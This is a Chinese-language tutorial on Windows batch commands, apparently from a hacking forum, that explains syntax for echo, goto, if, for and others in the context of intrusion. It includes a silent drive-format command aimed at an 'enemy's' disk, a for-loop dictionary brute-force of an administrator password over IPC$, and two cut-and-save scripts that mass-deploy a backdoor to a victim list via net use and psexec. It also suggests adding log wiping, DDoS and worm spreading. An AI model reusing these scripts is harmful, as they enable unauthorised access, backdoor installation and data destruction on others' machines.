批處理命令
1、Echo?命令
打開回顯或關閉請求回顯功能,或顯示消息。如果沒有任何參數,echo?命令將顯示當前回顯設置。
語法
echo?[{on│off}]?[message]
Sample:@echo?off?/?echo?hello?world
在實際應用中我們會把這條命令和重定向符號(也稱為管道符號,一般用>?>>?^)結合來實現輸入一
些命令到特定格式的文件中.這將在以后的例子中體現出來。?
2.@?命令
表示不顯示@后面的命令,在入侵過程中(例如使用批處理來格式化敵人的硬盤)自然不能讓對方看到你使用的命
令啦。
Sample:@echo?off
@echo?Now?initializing?the?program,please?wait?a?minite...
@format?X:?/q/u/autoset?(format?這個命令是不可以使用/y這個參數的,可喜的是微軟留了個autoset這個
參數給我們,效果和/y是一樣的。)
3.Goto?命令
指定跳轉到標簽,找到標簽后,程序將處理從下一行開始的命令。
語法:goto?label?(label是參數,指定所要轉向的批處理程序中的行。)?
Sample:
if?{%1}=={}?goto?noparms
if?{%2}=={}?goto?noparms(如果這里的if、%1、%2你不明白的話,先跳過去,后面會有詳細的解釋。)
@Rem?check?parameters?if?null?show?usage
:noparms
echo?Usage:?monitor.bat?ServerIP?PortNumber
goto?end
標簽的名字可以隨便起,但是最好是有意義的字母啦,字母前加個:用來表示這個字母是標簽,goto命令就是根
據這個:來尋找下一步跳到到那里。最好有一些說明這樣你別人看起來才會理解你的意圖啊。
4.Rem?命令
注釋命令,在C語言中相當與/*--------*/,它并不會被執行,只是起一個注釋的作用,便于別人閱讀和你自己日后
修改。
Rem?Message
Sample:@Rem?Here?is?the?description.
5.Pause?命令
運行?Pause?命令時,將顯示下面的消息:?
Press?any?key?to?continue?.?.?.?
Sample:
@echo?off?
:begin?
copy?a:*.*?d:\back
echo?Please?put?a?new?disk?into?driver?A?
pause?
goto?begin?
在這個例子中,驅動器?A?中磁盤上的所有文件均復制到d:\back中。顯示的注釋提示您將另一張磁盤放入驅動器?
A?時,pause?命令會使程序掛起,以便您更換磁盤,然后按任意鍵繼續處理。
6.Call?命令
從一個批處理程序調用另一個批處理程序,并且不終止父批處理程序。call?命令接受用作調用目標的標簽。如果在
腳本或批處理文件外使用?Call,它將不會在命令行起作用。
語法
call?[[Drive:][Path]?FileName?[BatchParameters]]?[:label?[arguments]]
參數
[Drive:}[Path]?FileName?
指定要調用的批處理程序的位置和名稱。filename?參數必須具有?.bat?或?.cmd?擴展名。
7.start?命令
調用外部程序,所有的DOS命令和命令行程序都可以由start命令來調用。
入侵常用參數:
MIN?開始時窗口最小化
SEPARATE?在分開的空間內開始?16?位?Windows?程序
HIGH?在?HIGH?優先級類別開始應用程序
REALTIME?在?REALTIME?優先級類別開始應用程序
WAIT?啟動應用程序并等候它結束
parameters?這些為傳送到命令/程序的參數
執行的應用程序是?32-位?GUI?應用程序時,CMD.EXE?不等應用程序終止就返回命令提示。如果在命令腳本內執
行,該新行為則不會發生。
8.choice?命令
choice?使用此命令可以讓用戶輸入一個字符,從而運行不同的命令。使用時應該加/c:參數,c:后應寫提示可輸入
的字符,之間無空格。它的返回碼為1234……
如:?choice?/c:dme?defrag,mem,end
將顯示
defrag,mem,end[D,M,E]?
Sample:
test.bat的內容如下:?
@echo?off?
choice?/c:dme?defrag,mem,end?
if?errorlevel?3?goto?defrag?(應先判斷數值最高的錯誤碼)
if?errorlevel?2?goto?mem?
if?errotlevel?1?goto?end?
:defrag?
c:\dos\defrag?
goto?end?
:mem?
mem?
goto?end?
:end?
echo?good?bye
此文件運行后,將顯示?defrag,mem,end[D,M,E]??用戶可選擇d?m?e?,然后if語句將作出判斷,d表示執行標
號為defrag的程序段,m表示執行標號為mem的程序段,e表示執行標號為end的程序段,每個程序段最后都以
goto?end將程序跳到end標號處,然后程序將顯示good?bye,文件結束。
9.If?命令
if?表示將判斷是否符合規定的條件,從而決定執行不同的命令。?有三種格式:?
1、if?"參數"?==?"字符串"? 待執行的命令?
參數如果等于指定的字符串,則條件成立,運行命令,否則運行下一句。(注意是兩個等號)
如if?"%1"=="a"?format?a:?
if?{%1}=={}?goto?noparms
if?{%2}=={}?goto?noparms
2、if?exist?文件名 ?待執行的命令?
如果有指定的文件,則條件成立,運行命令,否則運行下一句。
如if?exist?config.sys?edit?config.sys?
3、if?errorlevel?/?if?not?errorlevel?數字 ?待執行的命令?
如果返回碼等于指定的數字,則條件成立,運行命令,否則運行下一句。
如if?errorlevel?2?goto?x2?
DOS程序運行時都會返回一個數字給DOS,稱為錯誤碼errorlevel或稱返回碼,常見的返回碼為0、1。
10.for?命令
for?命令是一個比較復雜的命令,主要用于參數在指定的范圍內循環執行命令。
在批處理文件中使用?FOR?命令時,指定變量請使用?%%variable
for?{%variable│%%variable}?in?(set)?do?command?[?CommandLineOptions]
%variable?指定一個單一字母可替換的參數。
(set)?指定一個或一組文件。可以使用通配符。
command?指定對每個文件執行的命令。
command-parameters?為特定命令指定參數或命令行開關。
在批處理文件中使用?FOR?命令時,指定變量請使用?%%variable
而不要用?%variable。變量名稱是區分大小寫的,所以?%i?不同于?%I
如果命令擴展名被啟用,下列額外的?FOR?命令格式會受到
支持:
FOR?/D?%variable?IN?(set)?DO?command?[command-parameters]
如果集中包含通配符,則指定與目錄名匹配,而不與文件
名匹配。
FOR?/R?[[drive:]path]?%variable?IN?(set)?DO?command?[command-
檢查以?[drive:]path?為根的目錄樹,指向每個目錄中的
FOR?語句。如果在?/R?后沒有指定目錄,則使用當前
目錄。如果集僅為一個單點(.)字符,則枚舉該目錄樹。
FOR?/L?%variable?IN?(start,step,end)?DO?command?[command-para
該集表示以增量形式從開始到結束的一個數字序列。
因此,(1,1,5)?將產生序列?1?2?3?4?5,(5,-1,1)?將產生
序列?(5?4?3?2?1)。
FOR?/F?["options"]?%variable?IN?(file-set)?DO?command?
FOR?/F?["options"]?%variable?IN?("string")?DO?command?
FOR?/F?["options"]?%variable?IN?('command')?DO?command?
或者,如果有?usebackq?選項:
FOR?/F?["options"]?%variable?IN?(file-set)?DO?command?
FOR?/F?["options"]?%variable?IN?("string")?DO?command?
FOR?/F?["options"]?%variable?IN?('command')?DO?command?
filenameset?為一個或多個文件名。繼續到?filenameset?中的
下一個文件之前,每份文件都已被打開、讀取并經過處理。
處理包括讀取文件,將其分成一行行的文字,然后將每行
解析成零或更多的符號。然后用已找到的符號字符串變量值
調用?For?循環。以默認方式,/F?通過每個文件的每一行中分開
的第一個空白符號。跳過空白行。您可通過指定可選?"options"
參數替代默認解析操作。這個帶引號的字符串包括一個或多個
指定不同解析選項的關鍵字。這些關鍵字為:
eol=c?-?指一個行注釋字符的結尾(就一個)
skip=n?-?指在文件開始時忽略的行數。
delims=xxx?-?指分隔符集。這個替換了空格和跳格鍵的
默認分隔符集。
tokens=x,y,m-n?-?指每行的哪一個符號被傳遞到每個迭代
的?for?本身。這會導致額外變量名稱的
格式為一個范圍。通過?nth?符號指定?m
符號字符串中的最后一個字符星號,
那么額外的變量將在最后一個符號解析之
分配并接受行的保留文本。
usebackq?-?指定新語法已在下類情況中使用:
在作為命令執行一個后引號的字符串并且
引號字符為文字字符串命令并允許在?fi
中使用雙引號擴起文件名稱。
sample1:
FOR?/F?"eol=;?tokens=2,3*?delims=,?"?%i?in?(myfile.txt)?do?command
會分析?myfile.txt?中的每一行,忽略以分號打頭的那些行,將
每行中的第二個和第三個符號傳遞給?for?程序體;用逗號和/或
空格定界符號。請注意,這個?for?程序體的語句引用?%i?來
取得第二個符號,引用?%j?來取得第三個符號,引用?%k
來取得第三個符號后的所有剩余符號。對于帶有空格的文件
名,您需要用雙引號將文件名括起來。為了用這種方式來使
用雙引號,您還需要使用?usebackq?選項,否則,雙引號會
被理解成是用作定義某個要分析的字符串的。
%i?專門在?for?語句中得到說明,%j?和?%k?是通過
tokens=?選項專門得到說明的。您可以通過?tokens=?一行
指定最多?26?個符號,只要不試圖說明一個高于字母?'z'?或
'Z'?的變量。請記住,FOR?變量是單一字母、分大小寫和全局的;
同時不能有?52?個以上都在使用中。
您還可以在相鄰字符串上使用?FOR?/F?分析邏輯;方法是,
用單引號將括號之間的?filenameset?括起來。這樣,該字符
串會被當作一個文件中的一個單一輸入行。
最后,您可以用?FOR?/F?命令來分析命令的輸出。方法是,將
括號之間的?filenameset?變成一個反括字符串。該字符串會
被當作命令行,傳遞到一個子?CMD.EXE,其輸出會被抓進
內存,并被當作文件分析。因此,以下例子:
FOR?/F?"usebackq?delims=="?%i?IN?(`set`)?DO?@echo?%i
會枚舉當前環境中的環境變量名稱。
另外,FOR?變量參照的替換已被增強。您現在可以使用下列
選項語法:
~I?-?刪除任何引號("),擴充?%I
%~fI?-?將?%I?擴充到一個完全合格的路徑名
%~dI?-?僅將?%I?擴充到一個驅動器號
%~pI?-?僅將?%I?擴充到一個路徑
%~nI?-?僅將?%I?擴充到一個文件名
%~xI?-?僅將?%I?擴充到一個文件擴展名
%~sI?-?擴充的路徑只含有短名
%~aI?-?將?%I?擴充到文件的文件屬性
%~tI?-?將?%I?擴充到文件的日期/時間
%~zI?-?將?%I?擴充到文件的大小
%~$PATH:I?-?查找列在路徑環境變量的目錄,并將?%I?擴充
到找到的第一個完全合格的名稱。如果環境變量
未被定義,或者沒有找到文件,此組合鍵會擴充
空字符串
可以組合修飾符來得到多重結果:
%~dpI?-?僅將?%I?擴充到一個驅動器號和路徑
%~nxI?-?僅將?%I?擴充到一個文件名和擴展名
%~fsI?-?僅將?%I?擴充到一個帶有短名的完整路徑名
%~dp$PATH:i?-?查找列在路徑環境變量的目錄,并將?%I?擴充
到找到的第一個驅動器號和路徑。
%~ftzaI?-?將?%I?擴充到類似輸出線路的?DIR
在以上例子中,%I?和?PATH?可用其他有效數值代替。%~?語法
用一個有效的?FOR?變量名終止。選取類似?%I?的大寫變量名
比較易讀,而且避免與不分大小寫的組合鍵混淆。
以上是MS的官方幫助,下面我們舉幾個例子來具體說明一下For命令在入侵中的用途。
sample2:
利用For命令來實現對一臺目標Win2k主機的暴力密碼破解。
我們用net?use?\\ip\ipc$?"password"?/u:"administrator"來嘗試這和目標主機進行連接,當成功時記下密
碼。
最主要的命令是一條:for?/f?i%?in?(dict.txt)?do?net?use?\\ip\ipc$?"i%"?/u:"administrator"
用i%來表示admin的密碼,在dict.txt中這個取i%的值用net?use?命令來連接。然后將程序運行結果傳遞給find
命令--
for?/f?i%%?in?(dict.txt)?do?net?use?\\ip\ipc$?"i%%"?/u:"administrator"│find?":命令成功完成">&g
t;D:\ok.txt?,這樣就ko了。
sample3:
你有沒有過手里有大量肉雞等著你去種后門+木馬呢?,當數量特別多的時候,原本很開心的一件事都會變得很郁
悶:)。文章開頭就談到使用批處理文件,可以簡化日常或重復性任務。那么如何實現呢?呵呵,看下去你就會明
白了。
主要命令也只有一條:(在批處理文件中使用?FOR?命令時,指定變量使用?%%variable)
@for?/f?"tokens=1,2,3?delims=?"?%%i?in?(victim.txt)?do?start?call?cultivate.bat?%%i?%%j?%%k
tokens的用法請參見上面的sample1,在這里它表示按順序將victim.txt中的內容傳遞給cultivate.bat中的參
數%i?%j?%k。
而cultivate.bat無非就是用net?use命令來建立IPC$連接,并copy木馬+后門到victim并用返回碼(If?errorle
ver?=)來篩選成功種植后門的主機并echo出來,或者echo到文件。
delims=?表示vivtim.txt中的內容是一空格來分隔的。我想看到這里你也一定明白這victim.txt里的內容是什么樣
的了。應該根據%%i?%%j?%%k表示的對象來,一般就是?ip?password?username。
---------------?cut?here?then?save?as?a?batchfile(I?call?it?main.bat?)?---------------------------
@echo?off
@if?"%1"==""?goto?usage
@for?/f?"tokens=1,2,3?delims=?"?%%i?in?(victim.txt)?do?start?call?IPChack.bat?%%i?%%j?%%k
@goto?end
:usage
@echo?run?this?batch?in?dos?modle.or?just?double-click?it.
:end
---------------?cut?here?then?save?as?a?batchfile(I?call?it?main.bat?)?---------------------------
-------------------?cut?here?then?save?as?a?batchfile(I?call?it?door.bat)?-----------------------------
@net?use?\\%1\ipc$?%3?/u:"%2"
@if?errorlevel?1?goto?failed
@echo?Trying?to?establish?the?IPC$?connection?…………OK
@copy?windrv32.exe\\%1\admin$\system32?&&?if?not?errorlevel?1?echo?IP?%1?USER?%2?PWD?
%3?>>ko.txt
@p***ec?\\%1?c:\winnt\system32\windrv32.exe
@p***ec?\\%1?net?start?windrv32?&&?if?not?errorlevel?1?echo?%1?Backdoored?>>ko.txt
:failed
@echo?Sorry?can?not?connected?to?the?victim.
-----------------?cut?here?then?save?as?a?batchfile(I?call?it?door.bat)?--------------------------------
這只是一個自動種植后門批處理的雛形,兩個批處理和后門程序(Windrv32.exe),PSexec.exe需放在統一目
錄下.批處理內容
尚可擴展,例如:加入清除日志+DDOS的功能,加入定時添加用戶的功能,更深入一點可以使之具備自動傳播功能(蠕
蟲).此處不多做敘述,有興趣的朋友可自行研究.
|